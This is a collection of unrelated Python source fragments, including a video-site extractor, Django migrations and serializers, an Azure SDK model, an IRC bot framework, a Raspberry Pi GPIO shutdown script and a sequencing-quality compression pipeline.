get_encode_code(vl) key = get_path_key( vl.split('/')[-1].split('.')[0], format_id, segment_index) filesize = segment['b'] base_url = data['vp']['du'].split('/') base_url.insert(-1, key) base_url = '/'.join(base_url) param = { 'su': _uuid, 'qyid': uuid.uuid4().hex, 'client': '', 'z': '', 'bt': '', 'ct': '', 'tn': str(int(time.time())) } api_video_url = base_url + vl + '?' + \ compat_urllib_parse.urlencode(param) js = self._download_json( api_video_url, video_id, note='Download video info of segment %d for format %s' % (segment_index + 1, format_id)) video_url = js['l'] video_urls.append( (video_url, filesize)) video_urls_dict[format_id] = video_urls return video_urls_dict def get_format(self, bid): matched_format_ids = [_format_id for _bid, _format_id in self._FORMATS_MAP if _bid == str(bid)] return matched_format_ids[0] if len(matched_format_ids) else None def get_bid(self, format_id): matched_bids = [_bid for _bid, _format_id in self._FORMATS_MAP if _format_id == format_id] return matched_bids[0] if len(matched_bids) else None def get_raw_data(self, tvid, video_id, enc_key, _uuid): tm = str(int(time.time())) tail = tm + tvid param = { 'key': 'fvip', 'src': self.md5_text('youtube-dl'), 'tvId': tvid, 'vid': video_id, 'vinfo': 1, 'tm': tm, 'enc': self.md5_text(enc_key + tail), 'qyid': _uuid, 'tn': random.random(), 'um': 0, 'authkey': self.md5_text(self.md5_text('') + tail), } api_url = 'http://cache.video.qiyi.com/vms' + '?' + \ compat_urllib_parse.urlencode(param) raw_data = self._download_json(api_url, video_id) return raw_data def get_enc_key(self, swf_url, video_id): # TODO: automatic key extraction # last update at 2015-12-18 for Zombie::bite enc_key = '8b6b683780897eb8d9a48a02ccc4817d'[::-1] return enc_key def _real_extract(self, url): webpage = self._download_webpage( url, 'temp_id', note='download video page') tvid = self._search_regex( r'data-player-tvid\s*=\s*[\'"](\d+)', webpage, 'tvid') video_id = self._search_regex( r'data-player-videoid\s*=\s*[\'"]([a-f\d]+)', webpage, 'video_id') swf_url = self._search_regex( r'(http://[^\'"]+MainPlayer[^.]+\.swf)', webpage, 'swf player URL') _uuid = uuid.uuid4().hex enc_key = self.get_enc_key(swf_url, video_id) raw_data = self.get_raw_data(tvid, video_id, enc_key, _uuid) if raw_data['code'] != 'A000000': raise ExtractorError('Unable to load data. Error code: ' + raw_data['code']) if not raw_data['data']['vp']['tkl']: raise ExtractorError('No support iQiqy VIP video') data = raw_data['data'] title = data['vi']['vn'] # generate video_urls_dict video_urls_dict = self.construct_video_urls( data, video_id, _uuid) # construct info entries = [] for format_id in video_urls_dict:
video_urls = video_urls_dict[format_id] for i, video_url_info in enumerate(video_urls): if len(entries) < i + 1: entries.append({'formats': []}) entries[i]['formats'].append( { 'url': video_url_info[0], 'filesize': video_url_info[-1], 'format_id': format_id, 'preference': int(s
elf.get_bid(format_id)) } ) for i in range(len(entries)): self._sort_formats(entries[i]['formats']) entries[i].update( { 'id': '%s_part%d' % (video_id, i + 1), 'title': title, } ) if len(entries) > 1: info = { '_type': 'multi_video', 'id': video_id, 'title': title, 'entries': entries, }
ices=[(b'BGN', b'Began'), (b'END', b'Ended'), (b'OCR', b'Occurred')], max_length=3, null=True), ), migrations.AddField( model_name='authority', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='authority', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='authority', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='ccrelation', name='data_display_order', field=models.FloatField(default=1.0, help_text=b'Position at which the citation should be displayed in the citation detail view. Whole numbers or decimals can be used.'), ), migrations.AddField( model_name='ccrelation', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='ccrelation', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='ccrelation', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='citation', name='additional_titles', field=models.TextField(blank=True, help_text=b'Additional titles (not delimited, free text).', null=True), ), migrations.AddField( model_name='citation', name='book_series', field=models.CharField(blank=True, help_text=b'Used for books, and potentially other works in a series.', max_length=255, null=True), ), migrations.AddField( model_name='citation', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='citation', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='citation', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalacrelation', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalacrelation', name='personal_name_first', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalacrelation', name='personal_name_last', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalacrelation', name='personal_name_suf
fix', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField(
model_name='historicalacrelation', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalacrelation', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalattribute', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalattribute', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalattribute', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalattribute', name='type_qualifier', field=models.CharField(blank=True, choices=[(b'BGN', b'Began'), (b'END', b'Ended'), (b'OCR', b'Occurred')], max_length=3, null=True), ), migrations.AddField( model_name='historicalauthority', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalauthority', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalauthority', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalccrelation', name='data_display_order', field=models.FloatField(default=1.0, help_text=b'Position at which the citation should be displayed in the citation detail view. Whole numbers or decimals can be used.'), ), migrations.AddField( model_name='historicalccrelation', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalccrelation', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalccrelation', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalcitation', name='additional_titles', field=models.TextField(blank=True, help_text=b'Additional titles (not delimited, free text).', null=True), ), migrations.AddField( model_name='historicalcitation', name='book_series', field=models.CharField(blank=True, help_text=b'Used for books, and potentially other works in a series.', max_length=255, null=True), ), migrations.AddField( model_name='historicalcitation', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalcitation', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalcitation', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicallinkeddata', name='access_status', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicallinkeddata', name='access_status_date_verified', field=models.DateField(blank=True, null=True), ), migrations.AddField( model_name='historicallinkeddata', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicallinkeddata', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicallinkeddata', name='record_status_value',
# -*- coding: utf-8 -*- # Generated by Django 1.9.8 on 2016-10-14 12:51 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Document', fields=[ ('id', models.AutoField(primary_key=True, serialize=False)), ('title', models.CharField(max_length=100)), ('content', models.TextField()), ('time', models.DateTimeField(auto_now_add=True)), ('meta_tag', models.CharField(max_length=150)), ('view_count', models.IntegerField(default=0, editable=False)), ('public_doc',
models.BooleanField()),
('update_time', models.DateTimeField(auto_now=True)), ], ), ]
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class UploadCertificateResponse(Model): """The upload registration certificate response. All required parameters must be populated in order to send to Azure. :param auth_type: Specifies authentication type. Possible values include: 'Invalid', 'AzureActiveDirectory' :type auth_type: str or ~azure.mgmt.edgegateway.models.AuthenticationType :param resource_id: Required. The resource ID of the Data Box Edge/Gateway device. :type resource_id: str :param aad_authority: Required. Azure Active Directory tenant authority. :type aad_authority: str :param aad_tenant_id: Required. Azure Active Directory tenant ID. :type aad_tenant_id: str :param service_principal_client_id: Required. Azure Active Directory service principal client ID. :type service_principal_client_id: str :param service_principal_object_id: Required. Azure Active Directory service principal object ID. :type service_principal_object_id: str :param azure_management_endpoint_audience: Required. The azu
re management endpoint audience. :type azure_management_endpoint_audience: str """ _validation = { 'resource_id': {'required': True}, 'aad_authority': {'required': True}, 'aad_tenant_id': {'required': True}, 'service_principal_client_id'
: {'required': True}, 'service_principal_object_id': {'required': True}, 'azure_management_endpoint_audience': {'required': True}, } _attribute_map = { 'auth_type': {'key': 'authType', 'type': 'str'}, 'resource_id': {'key': 'resourceId', 'type': 'str'}, 'aad_authority': {'key': 'aadAuthority', 'type': 'str'}, 'aad_tenant_id': {'key': 'aadTenantId', 'type': 'str'}, 'service_principal_client_id': {'key': 'servicePrincipalClientId', 'type': 'str'}, 'service_principal_object_id': {'key': 'servicePrincipalObjectId', 'type': 'str'}, 'azure_management_endpoint_audience': {'key': 'azureManagementEndpointAudience', 'type': 'str'}, } def __init__(self, **kwargs): super(UploadCertificateResponse, self).__init__(**kwargs) self.auth_type = kwargs.get('auth_type', None) self.resource_id = kwargs.get('resource_id', None) self.aad_authority = kwargs.get('aad_authority', None) self.aad_tenant_id = kwargs.get('aad_tenant_id', None) self.service_principal_client_id = kwargs.get('service_principal_client_id', None) self.service_principal_object_id = kwargs.get('service_principal_object_id', None) self.azure_management_endpoint_audience = kwargs.get('azure_management_endpoint_audience', None)
'''Todo: * Add multiple thread support for async_process functions * Potentially thread each handler function? idk ''' import sys import socket import re import threading import logging import time if sys.hexversion < 0x03000000: #Python 2 import Queue as queue BlockingIOError = socket.error else: import queue from .ircclient import IRCClient logger = logging.getLogger(__name__) #Somewhat complex regex that accurately matches nick!username@host, with named groups for easy parsing and usage user_re = re.compile(r'(?P<nick>[\w\d<-\[\]\^\{\}\~]+)!(?P<user>[\w\d<-\[\]\^\{\}\~]+)@(?P<host>.+)') class IRCBot(IRCClient): '''See `IRCClient` for basic client usage, here is usage for the bot system Handler notation: on_join(self, nick, host, channel) on_topic(self, nick, host, channel, topic) on_part(self, nick, host, channel, message) on_msg(self, nick, host, channel, message) on_privmsg(self, nick, host, message) on_chanmsg(self, nick, host, channel, message) on_notice(self, nick, host, channel, message) on_nick(self, nick, new_nick, host) ''' _handlers = { 'join': [], 'part': [], 'kick': [], 'topic': [], 'msg': [], 'privmsg': [], 'chanmsg': [], 'notice': [], 'nick': [] } _process_thread = None def _async_process(self): while not self._stop_event.is_set(): time.sleep(0.01) try: args = self._in_queue.get_nowait() #These "msg"s will be raw irc received lines, which have several forms # basically, we should be looking for # :User!Name@host COMMAND <ARGS> userhost = user_re.search(args[0][1:]) if userhost: nick, host, user = userhost.groups() command = args[1] if command == 'JOIN': channel = args[2][1:] #JOIN Channels are : prefixed for handler in self._handlers['join']: handler(self, nick, host, channel) elif command == 'TOPIC': channel = args[2] topic = ' '.join(args[3:]) for handler in self._handlers['topic']: handler(self, nick, host, channel, topic) elif command == 'PART': channel = args[2] message = ' '.join(args[3:]) for handler in self._handlers['part']: handler(self, nick, host, channel, message) elif command == 'PRIVMSG': channel = args[2] message = ' '.join(args[3:])[1:] for handler in self._handlers['msg']: handler(self, nick, host, channel, message) if channel[0] == '#': #this is a channel for handler in self._handlers['chanmsg']: handler(self, nick, host, channel, message) else: #private message for handler in self._handlers['privmsg']: handler(self, nick, host, message) elif command == 'KICK': channel = args[2] kicked_nick = args[3] reason = ' '.join(args[4:])[1:]
for handler in self._handlers['kick']: handler(self, nick, host, channel, kicked_nick, reason) elif command == 'NICK': new_nick = args[2][1:] for handler in self._handlers['nick']: handler(self, nick, new_nick, host) elif command == 'NOTICE': #:nick!user@host NOTICE <userchan> :message
channel = args[2] message = ' '.join(args[3:]) for handler in self._handlers['notice']: handler(self, nick, host, channel, message) else: logger.warning("Unhandled command %s" % command) self._in_queue.task_done() except queue.Empty as e: pass except Exception as e: logger.exception("Error while handling message " + str(args)) def start(self): IRCClient.start(self) self._process_thread = threading.Thread(target=self._async_process) self._process_thread.start() def on(self, type): '''Decorator function''' def decorator(self, func): '''decorated functions should be written as class methods @on('join') def on_join(self, channel): print("Joined channel %s" % channel) ''' self._handlers[type].append(func) return func return decorator def on_join(self, func): self._handlers['join'].append(func) return func def on_part(self, func): self._handlers['part'].append(func) return func def on_kick(self, func): self._handlers['kick'].append(func) return func def on_msg(self, func): self._handlers['msg'].append(func) return func def on_privmsg(self, func): self._handlers['privmsg'].append(func) return func def on_chanmsg(self, func): self._handlers['chanmsg'].append(func) return func def on_notice(self, func): self._handlers['notice'].append(func) return func def on_nick(self, func): self._handlers['nick'].append(func) return func __all__ = ['IRCBot']
from django.http import HttpRequest from django.conf import settings from django.utils.translation import ugettext_lazy as _ try: from allauth.account import app_settings as allauth_settings from allauth.utils import (email_address_exists, get_username_max_length) from allauth.account.adapter import get_adapter from allauth.account.utils import setup_user_email except ImportError: raise ImportError("allauth needs to be added to INSTALLED_APPS.") from rest_framework import serializers from requests.exceptions import HTTPError # Import is needed only if we are using social login, in which # case the allauth.socialaccount will be declared if 'allauth.socialaccount' in settings.INSTALLED_APPS: from allauth.socialaccount.helpers import complete_social_login class SocialLoginSerializer(serializers.Serializer): access_token = serializers.CharField(required=False, allow_blank=True) code = serializers.CharField(required=False, allow_blank=True) def _get_request(self): request = self.context.get('request') if not isinstance(request, HttpRequest): request = request._request return request def get_social_login(self, adapter, app, token, response): """ :param adapter: allauth.socialaccount Adapter subclass. Usually OAuthAdapter or Auth2Adapter :param app: `allauth.socialaccount.SocialApp` instance :param token: `allauth.socialaccount.SocialToken` instance :param response: Provider's response for OAuth1. Not used in the :returns: A populated instance of the `allauth.socialaccount.SocialLoginView` instance """ request = self._get_request() social_login = adapter.complete_login(request, app, token, response=response) social_login.token = token return social_login def validate(self, attrs): view = self.context.get('view') request = self._get_request() if not view: raise serializers.ValidationError( _("View is not defined, pass it as a context variable") ) adapter_class = getattr(view, 'adapter_class', None) if not adapter_class: raise serializers.ValidationError(_("Define adapter_class in view")) adapter = adapter_class(request) app = adapter.get_provider().get_app(request) # More info on code vs access_token # http://stackoverflow.com/questions/8666316/facebook-oauth-2-0-code-and-token # Case 1: We received the access_token if attrs.get('access_token'): access_token = attrs.get('access_token') # Case 2: We received the authorization code elif attrs.get('code'): self.callback_url = getattr(view, 'callback_url', None) self.client_class = getattr(view, 'client_class', None) if not self.callback_url: raise serializers.ValidationError( _("Define callback_url in view") ) if not self.client_class: raise serializers.ValidationError( _("Define client_class in view") ) code = attrs.get('code') provider = adapter.get_provider() scope = provider.get_scope(request) client = self.client_class( request, app.client_id, app.secret, adapter.access_token_method, adapter.access_token_url, self.callback_url, scope ) token = client.get_access_token(code) access_token = token['access_token'] else: raise serializers.ValidationError( _("Incorrect input. access_token or code is required.")) social_token = adapter.parse_token({'access_token': access_token}) social_token.app = app try: login = self.get_social_login(adapter, app, social_token, access_token) complete_social_login(request, login) except HTTPError: r
aise serializers.ValidationError(_('Incorrect value')) if not login.is_existing: login.lookup() login.save(request, connect=True) attrs['user'] = login.account.user return attrs class RegisterSerializer(serializers.Serializer): username = serializers.CharField( max_length=get_username_max_length(), min_length=allauth_setting
s.USERNAME_MIN_LENGTH, required=allauth_settings.USERNAME_REQUIRED ) email = serializers.EmailField(required=allauth_settings.EMAIL_REQUIRED) password1 = serializers.CharField(write_only=True) password2 = serializers.CharField(write_only=True) def validate_username(self, username): username = get_adapter().clean_username(username) return username def validate_email(self, email): email = get_adapter().clean_email(email) if allauth_settings.UNIQUE_EMAIL: if email and email_address_exists(email): raise serializers.ValidationError( _("A user is already registered with this e-mail address.")) return email def validate_password1(self, password): return get_adapter().clean_password(password) def validate(self, data): if data['password1'] != data['password2']: raise serializers.ValidationError(_("The two password fields didn't match.")) return data def custom_signup(self, request, user): pass def get_cleaned_data(self): return { 'username': self.validated_data.get('username', ''), 'password1': self.validated_data.get('password1', ''), 'email': self.validated_data.get('email', '') } def save(self, request): adapter = get_adapter() user = adapter.new_user(request) self.cleaned_data = self.get_cleaned_data() adapter.save_user(request, user, self) self.custom_signup(request, user) setup_user_email(request, user, []) return user class VerifyEmailSerializer(serializers.Serializer): key = serializers.CharField()
#!/Users/shreyashirday/Personal/
openmdao-0.13.0/bin/python # EASY-INSTALL-SCRIPT: 'docutils==0.10','rst2odt_prepstyles.py' __requires__ = 'docutils==0.10' __import__('pkg_resources').run_script('docutils==0.10', 'rst2odt_pre
pstyles.py')
#!/usr/bin/env python2.7 # # Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a c
opy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Module
for all exception's which search services may raise.""" from search.common import utils class Error(Exception): """Generic error.""" def ToString(self, error_prefix): """Builds error message string escaping it for HTML. Args: error_prefix: an error prefix. Returns: HTML escaped error message. """ if error_prefix: return utils.HtmlEscape( "{0}: {1}".format(error_prefix, str("\n".join(self.args)))) else: return utils.HtmlEscape("Error: {0}".format(str("\n".join(self.args)))) def __str__(self): return self.ToString("Error") class BadQueryException(Error): """BadQueryException error.""" def __str__(self): return self.ToString("BadQueryException") # Places search service pool exception. class PoolConnectionException(Error): """PoolConnectionException error.""" def __str__(self): return self.ToString("PoolConnectionException") def main(): pass if __name__ == "__main__": main()
#! /usr/bin/env python # coding: utf-8 -*- import RPi.GPIO as GPIO import time import os #config #ch
ange the GPIO Port number gpioport=24 sdate = time.strftime("%H:%M:%S") stime = time.strftime("%Y-%m-%d") GPIO.setmode(GPIO.BCM) GPIO.setup(gpioport, GPIO.IN) def sysshutdown(channel): msg="System shutdown GPIO.Low state" logpath="/var/log/shutdown.log" print("System shutdown") f = open(logpath, "a") f.write(str(sdate)+";"+str(stime)+";"+str(msg)+";") f.close() os.system("shutdown -h now") while True: if(GPIO.input(gpioport)): sysshu
tdown("1") break time.sleep(2)
d_dirs.append('original') options.compressed_dirs.append('goodbad') options.compressed_dirs.append('maxqual') options.compressed_dirs.append('minqual') for reads_filename in options.reads_filenames: # Copy the original sequences over. out_cmd("", std_err_file.name, ["cp", reads_filename, options.output_dir + '/original/' + os.path.basename(reads_filename)]) shutil.copyfile(reads_filename, options.output_dir + '/original/' + os.path.basename(reads_filename)) # Good/bad binary compression. call_arr = GB_COMPRESSION_CMD.replace('[READ]', reads_filename)\ .replace('[COMPRESSED_FILE]', options.output_dir + '/goodbad/' + os.path.basename(reads_filename) + '.comp').split() output_fp = open(options.output_dir + '/goodbad/' + os.path.basename(reads_filename), 'w') out_cmd(options.output_dir + '/goodbad/' + os.path.basename(reads_filename), std_err_file.name, call_arr) call(call_arr, stdout=output_fp, stderr=std_err_file) # Max/min quality value compression. We can use good_bad.py script to do this. call_arr = MAX_VALUE_COMPRESSION_CMD.replace('[READ]', reads_filename)\ .replace('[COMPRESSED_FILE]', options.output_dir + '/maxqual/' + os.path.basename(reads_filename) + '.comp')\ .replace('[MAX_QV]', options.max_quality).split() output_fp = open(options.output_dir + '/maxqual/' + os.path.basename(reads_filename), 'w') out_cmd(options.output_dir + '/maxqual/' + os.path.basename(reads_filename), std_err_file.name, call_arr) call(call_arr, stdout=output_fp, stderr=std_err_file) call_arr = MIN_VALUE_COMPRESSION_CMD.replace('[READ]', reads_filename)\ .replace('[COMPRESSED_FILE]', options.output_dir + '/minqual/' + os.path.basename(reads_filename) + '.comp').split() output_fp = open(options.output_dir + '/minqual/' + os.path.basename(reads_filename), 'w') out_cmd(options.output_dir + '/minqual/' + os.path.basename(reads_filename), std_err_file.name, call_arr) call(call_arr, stdout=output_fp, stderr=std_err_file) #continue # Polynomial regression. if options.poly_degrees: for degree in options.poly_degrees.split(','): ensure_dir(options.output_dir + '/degree_' + degree + '/') if 'degree_' + degree not in options.compressed_dirs: options.compressed_dirs.append('degree_' + degree) #continue call_arr = POLY_REGRESSION_CMD.replace('[READ]', reads_filename)\ .replace('[OUTPUT]', options.output_dir + '/degree_' + degree + '/' + os.path.basename(reads_filename))\ .replace('[DEGREE]', degree)\ .replace('[COMPRESSED_FILE]', options.output_dir + '/degree_' + degree +'/' + os.path.basename(reads_filename) + '.comp')\ .replace('[NUM_THREADS]', options.threads)\ .replace('[MAX_QV]', options.max_quality).split() out_cmd("", std_err_file.name, call_arr) call(call_arr, stderr=std_err_file) # Profile compression using k-means. if options.profile_sizes: for profiles in options.profile_sizes.split(','): ensure_dir(options.output_dir + '/profile_' + profiles + '/') if 'profile_' + profiles not in options.compressed_dirs: options.compressed_dirs.append('profile_' + profiles) #continue call_arr = PROFILE_COMPRESSION_CMD.replace('[READ]', reads_filename)\ .replace('[OUTPUT]', options.output_dir + '/profile_' + profiles + '/' + os.path.basename(reads_filename))\ .replace('[NUM_PROFILES]', profiles)\ .replace('[TRAINING_SIZE]', options.training_size)\ .replace('[COMPRESSED_FILE]', options.output_dir + '/profile_' + profiles +'/' + os.path.basename(reads_filename) + '.comp')\ .replace('[NUM_THREADS]', options.threads).split() out_cmd("", std_err_file.name, call_arr) call(call_arr, stderr=std_err_file) # Compress using QualComp. if options.rates: for rate in options.rates.split(','): #continue ensure_dir(options.output_dir + '/qualcomp_r' + rate + '/') if 'qualcomp_r' + rate not in options.compressed_dirs: options.compressed_dirs.append('qualcomp_r' + rate) #continue """ QUALCOMP_COMPRESS_CMD = "$QUALCOMP/runCompressMod.sh -i [READ] -c [CLUSTERS] -r [RATE]" QUALCOMP_DECOMPRESS_CMD = "$QUALCOMP/runDecompress.sh -p [DIR] -c [CLUSTERS] -r [RATE]" """ reads_abs_path = os.path.abspath(reads_filename) prev_dir = os.getcwd() os.chdir(os.environ["QUALCOMP"]) call_arr = QUALCOMP_COMPRESS_CMD.replace('[READ]', reads_abs_path)\ .replace('[CLUSTERS]', options.clusters)\ .replace('[RATE]', rate).split() out_cmd(std_err_file.name, std_err_file.name, call_arr) call(call_arr, stdout=std_err_file, stderr=std_err_file) # Also decompress using QualComp special function. qualcomp_prefix = reads_abs_path.split('.')[0] call_arr = QUALCOMP_DECOMPRESS_CMD.replace('[DIR]', qualcomp_prefix)\ .replace('[CLUSTERS]', options.clusters)\ .replace('[RATE]', rate).split() out_cmd(std_err_file.name, std_err_file.name, call_arr)
call(call_arr, stdout=std_err_file, stderr=std_err_file) os.chdir(prev_dir) # QualComp writes the files into the original directory, # so move the fastq files into the QualComp directory. mv_cmd = "mv " + qualcomp_prefix + "_" + options.clusters + "_" + rate + ".fastq " + options.output
_dir + '/qualcomp_r' + rate + '/' + os.path.basename(reads_filename) call_arr = mv_cmd.split() out_cmd("", std_err_file.name, call_arr) call(call_arr, stderr=std_err_file) filename_list = glob.glob(qualcomp_prefix + "_" + options.clusters + "_*") mv_cmd = "mv " + ' '.join(filename_list) + ' ' + options.output_dir + '/qualcomp_r' + rate + '/' call_arr = mv_cmd.split() out_cmd("", std_err_file.name, call_arr) call(call_arr, stderr=std_err_file) # Concatenate all the binary files to create a single 'compressed' file. filename_list = glob.glob(options.output_dir + '/qualcomp_r' + rate + '/' + os.path.basename(reads_filename).split(".")[0] + "*bin") cat_cmd = "cat " + ' '.join(filename_list) call_arr = cat_cmd.split() bin_file = open(options.output_dir + '/qualcomp_r' + rate + '/' + os.path.basename(reads_filename) + '.comp', 'w') out_cmd(bin_file.name, std_err_file.name, call_arr) call(call_arr, stdout=bin_file, stderr=std_err_file) # Compress using QualComp. if options.qvz_rates: for rate in options.qvz_rates.split(','): ensure_dir(options.output_dir + '/qvz_r' + rate + '/') if 'qvz_r' + rate not in options.compressed_dirs: options.compressed_dirs.append('qvz_r' + rate) """ QVZ_COMPRESS_CMD = "[QVZ]/qvz -c [CLUSTERS] -r [RATE] -v [READ] [OUTPUT]" QVZ_DECOMPRESS_CMD = "[QVZ]/qvz -x -v [INPUT] [OUTPUT]" """ # We first need to get the quality values only. TODO(cmhill): Very hacky. with open(reads_filename) as fin, open(options.output_dir + '/qvz_r' + rate + '/orig_' + os.path.basename(reads_filename) + '.quals', 'w') as
"""Prepare rendering of popular smart grid actions widget""" from apps.widgets.smartgrid import smartgrid def supply(request, page_nam
e): """Supply view_objects content, which are the popular actions from the smart grid game.""" _ = request num_results = 5 if page_name != "status" else None #contruct a dictionary containing the most popular tasks. #The keys are the type of the task and the values are a list of tasks.""" popular_tasks = { "Activity": smartgrid.get_popular_actions("activity", "approved", num_results), "Co
mmitment": smartgrid.get_popular_actions("commitment", "approved", num_results), "Event": smartgrid.get_popular_actions("event", "pending", num_results), "Excursion": smartgrid.get_popular_actions("excursion", "pending", num_results), } count = len(popular_tasks) return { "popular_tasks": popular_tasks, "no_carousel": page_name == "status", "range": count, }
# -*- coding: utf-8 -*- # Generated by Django 1.11.28 on 2020-02-29 16:58 from __future__ import unicode_literals import django.contrib.auth.validators from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('sa_api_v2', '0004_django_19_updates'), ] operations = [ migrations.AddField( model_name='attachment', name='height', field=models.IntegerField(blank=True, null=True), ),
migrations.AddF
ield( model_name='attachment', name='width', field=models.IntegerField(blank=True, null=True), ), ]
"""Authentication and authorization.""" from haas.errors import AuthorizationError from haas import model from abc import ABCMeta, abstractmethod import sys _auth_backend = None class AuthBackend(object): """An authentication/authorization backend. Extensions which implement authentication/authorization backends should inherit from this class, and invoke ``set_auth_backend()`` on an instance of the subclass Subclasses of AuthBackend must override `authenticate`, `_have_admin`, and `_have_project_access`, and nothing else. Users of the AuthBackend must not invoke `_have_admin` and `_have_project_access`, preferring `have_admin` and `have_project_access`. """ __metaclass__ = ABCMeta @abstractmethod def authenticate(self
): ""
"Authenticate the api call, and prepare for later authorization checks. This method will be invoked inside of a flask request context, with ``haas.rest.local.db`` initialized to a valid database session. It is responsible for authenticating the request, and storing any data it will need later to determine whether the requested operation is authorized. The attribute ``haas.rest.local.auth`` is reserved for use by auth backends; A backend may store any information it needs as that attribute. This method must return a boolean indicating whether or not authentication was successful -- True if so, False if not. """ @abstractmethod def _have_admin(self): """Check if the request is authorized to act as an administrator. Return True if so, False if not. This will be called sometime after ``authenticate()``. """ @abstractmethod def _have_project_access(self, project): """Check if the request is authorized to act as the given project. Each backend must implement this method. The backend does not need to deal with the case where the authenticated user is an admin here; the `have_*` and `require_*` wrappers handle this. """ def have_admin(self): """Check if the request is authorized to act as an administrator. Return True if so, False if not. This will be caled sometime after ``authenticate()``. """ return self._have_admin() def have_project_access(self, project): """Check if the request is authorized to act as the given project. Return True if so, False if not. This will be caled sometime after ``authenticate()``. ``project`` will be a ``Project`` object, *not* the name of the project. Note that have_admin implies have_project_acccess. """ assert isinstance(project, model.Project) return self._have_admin() or self._have_project_access(project) def require_admin(self): """Ensure the request is authorized to act as an administrator. Raises an ``AuthorizationError`` on failure, instead of returning False. This is a convienence wrapper around ``have_admin``, and should not be overwritten by subclasses. """ if not self.have_admin(): raise AuthorizationError("This operation is administrator-only.") def require_project_access(self, project): """Like ``require_admin()``, but wraps ``have_project_access()``.""" if not self.have_project_access(project): raise AuthorizationError( "You do not have access to the required project.") def set_auth_backend(backend): """Set the authentication backend to ``backend``. This should be called exactly once, on startup, with an instance of ``AuthBackend`` as it's argument. """ global _auth_backend if _auth_backend is not None: sys.exit("Fatal Error: set_auth_backed() called twice. Make sure " "you don't have conflicting extensions loaded.") _auth_backend = backend def get_auth_backend(): """Return the current auth backend.""" return _auth_backend
""" Author: Seyed Hamidreza Mohammadi This file is part of the shamidreza/uniselection software. Please refer to the LICENSE provided alongside the software (which is GPL v2, http://www.gnu.org/licenses/gpl-2.0.html). This file includes the code for putting all the pieces together. """ from utils import * from extract_unit_info import * from search import * from generate_speech import * if __name__ == "__main__": if 0: # test pit2gci pit_file='/Users/hamid/Code/hts/HTS-demo_CMU-ARCTIC-SLT2/gen/qst001/ver1/2mix/2/alice01.lf0' target_gci = pit2gci(pit_file) if 1: # test read_dur,pit,for methods dur_file='/Users/hamid/Code/hts/HTS-demo_CMU-ARCTIC-SLT2/gen/qst001/ver1/2mix/2/alice01.dur' for_file='/Users/hamid/Code/hts/HTS-demo_CMU-ARCTIC-SLT2/gen/qst001/ver1/2mix/2/alice01.for' pit_file='/Users/hamid/Code/hts/HTS-demo_CMU-ARCTIC-SLT2/gen/qst001/ver1/2mix/2/alice01.lf0' #a=read_hts_for(for_file) #b=read_hts_pit(pit_file) #c=read_hts_dur(dur_file) fname = 'arctic_a0001' lab_name=corpus_path+'/lab/'+fname+'.lab' wav_name=corpus_path+'/wav/'+fname+'.wav' pm_name=corpus_path+'/pm/'+fname+'.pm' ##target_units = load_input(lab_name) #times, labs = read_lab(lab_name) ##tmp_units=extract_info(lab_name, wav_name, 0,0) times, pits, vox_times, vox_vals = read_hts_pit(pit_file) frm_time, frm_val = read_hts_for(for_file) gcis=pit2gci(times, pits, vox_times, vox_vals) tmp_units, 